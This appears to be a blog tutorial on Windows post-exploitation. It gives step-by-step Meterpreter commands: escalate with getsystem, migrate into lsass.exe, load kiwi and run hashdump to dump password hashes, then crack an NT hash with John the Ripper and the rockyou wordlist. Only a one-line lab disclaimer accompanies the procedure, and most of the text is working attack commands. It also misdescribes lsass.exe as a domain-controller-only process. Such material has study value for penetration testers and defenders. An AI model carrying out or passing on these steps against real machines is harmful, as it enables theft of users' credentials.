BOOK THIS SPACE FOR AD
ARTICLE ADIn the previous article I have demonstrated you how to do privilege escalation on windows machine…I have promised you to demonstrate you post exploitation on windows machine…I will demonstrate you how to dump and crack the victim’s user credentials on windows machine….
If you don’t know how to get meterpreter shell of victim machine checkout my previous article on how to get meterpreter shell of target windows machine…
Also If you don’t know how to do privilege escalation of the victim machine check out my previous article in which I demonstrated to you how to do privilege Escalation on the target machine…
Now, After getting a full-fledged meterpreter shell of the victim’s machine.
meterpreter shellRun getsystem command to cross check weather it escalarated the privilege or not…
getsystem
to check the processes which the victim’s machine is running at that movement the command is
ps
After executing this command you will see the whole bunch of processes that the system is running..
To check your current process Id…
getpid
name of the processTo harvest the credentials I have to migrate to the of process ID 452 which is lsass.exe….
Let me clear you in short Local Security Authority Subsystem Service (Lsass.exe) is the process on an Active Directory domain controller….It’s responsible for providing Active Directory database lookups, authentication, and replication….
To migrate from the current process which is fnTAZizrHE PID=1912 to lsass.exe PID=452…..the command is are as follows
migrate 452
migration completedAfter migrating to lsass.exe load Kiwi framework to harvest the credentials. for this the command is…
load kiwi
To see the credentials you have to dump the hash key which is saved on the victim’s machine. The command is…..
hashdump
In short, Hashing is the process of transforming any given key or a string of characters into another value…This mechanism secure the credentials…That it….
For this article, I will be cracking the hash of User:Shadab…The last hash after the : specify the password so I will copy the hash to a test file…
To save the hash into a file the command is
echo 7a2199…………….5f > victim.txt
Now the hash is saved into the victim.txt file…Now I will use John-The-Ripper a password cracking tool…
Make sure you have unzipped the rockyou.txt.gz file which is in /usr/share/wordlists/ to unzip it…the command is…
gunzip /usr/share/wordlists/rockyou.txt.gz
For extracting the hashing password….the command is….
john — format=NT victim.txt — wordlist=/usr/share/wordlists/rockyou.txt
successfully cracked the password of user Shadab
User : PasswordShadab : 12345
Successfully I have dumped the passwords of victim’s machine…
Hacking is illegal…practice this is your lab environment..
In this short article, I have tried to demonstrate you how to dump the password of the victim’s window machine using metasploit framework, kiwi framework, John-the-ripper tool…also how to take shell and privilege escalate the machine for post exploitation….I will be coving next how to do persistence on victim’s window_7 machine….
Thank you for Reading!!
author: Shadab Mazhar